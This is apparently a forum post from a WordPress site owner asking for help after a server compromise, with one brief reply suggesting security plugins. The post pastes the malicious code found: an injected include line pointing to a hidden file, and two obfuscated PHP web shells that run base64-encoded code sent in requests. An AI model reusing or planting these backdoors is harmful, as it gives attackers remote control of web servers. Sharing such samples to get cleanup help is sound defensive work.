Hey guys, how are you doing?
**update: I’ve got the site back online by removing most of files and malicious code I could find by date with FTP access. I’m installing wordfence now, and will run him and then sucuri. It still infected as it is creating new files as I’m typing this.**
I’ve tried rebooting, upgrading and updating the server, tried to direct the domain to Cloudflare (didn’t arrive, odd). Then, I tried debug mode, renaming everything in the wp-content, the .htaccess file, increasing the WP\_MEMORY\_LIMIT to 256M and nothing changed.
Today, I went again for the files, reset the server root user, and found this code on the index.php, config.php, and other php files. file:
@ include (“/var/www/html/wp-includes/images/crystal/ .de5163f6.inc”);
/\* spaces added for reddit post\*/
I also found 2 files called “wp-log-SVZpej.php.suspected” and “wp-working-need-hdr.php.suspected”.I sent the content of them to GPT AI and it confirmed me as a malicious script.
Here is the “wp-working-need-hdr.pbp.suspected”:
`<?php error_reporting(0); $ajzvw = array_merge($_GET, $_COOKIE, $_POST); $fzipc = ‘in_’.’ar’.’ray’; if($ajzvw[‘m’]==’1′) die(‘c920bd25bfe7c05c3a51ef5a9879fcbd’); if(md5($ajzvw[‘a2e5e’])===’c920bd25bfe7c05c3a51ef5a9879fcbd’) ggsnv($ajzvw); function ggsnv($lxlto){ $uhfii =’fi’.’le_’.’exi’.’sts’; $ykplv =’f’ .’op’ .’en’; $qbekt = ‘f’.’cl’.’ose’; $ceduf = ‘u’.’nl’.’ink’; if($uhfii(‘./wp-sale.js’)){@$ceduf(‘./wp-sale.js’);} $lioel = ‘t’.’mpf’.’ile’; $cejqo = ‘fw’.’rite’; $zeceh = ‘fs’.’eek’; $yfhky = ‘ba’.’se’.chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).’o’. chr(100) . chr(101); $fzipc = ‘str’.’ea’.’m_’.’get’.’_m’.’eta’.’_’.’data’; $yjdxs = $lioel(); if(fwrite($yjdxs, chr(60).chr(63).chr(112).chr(104).chr(112).chr(32). $yfhky($lxlto[‘ab75a’]))!=false){ include($fzipc($yjdxs)[‘uri’]); $qbekt($yjdxs); } else { @eval($yfhky($lxlto[‘ab75a’])); } } ?>`
Here is the one on “wp-log-SVZpej.php.suspected”:
`<?php $t=”er”.”ro”.”r_”.”r”.”epo”.”rt”.”in”.”g”;$t(0); $a=sys_get_temp_dir();if(isset($_POST[‘bh’])){if(md5($_POST[‘bh’])===”8f1f964a4b4d8d1ac3f0386693d28d03″){$b3=$_POST[‘b3’];file_put_contents($a.”/tpfile”,”<“.”?”.”p”.”h”.”p “.base64_decode($b3));@include($a.”/tpfile”);die();}}if(isset($_POST[‘tick’])||isset($_GET[‘tick’])){echo md5(‘885’);}`
Fun enough, I have a copy of the same WP files dated 2021 in another folder in this server, so it was quite fast to see which files were new or updated in both live and “backup” files.
Did anyone went trough the same thing? I fear I don’t have a backup for this, although I am looking within my clouds yet.
Have you tried installing wordfence or sucuri to scan and clean the website?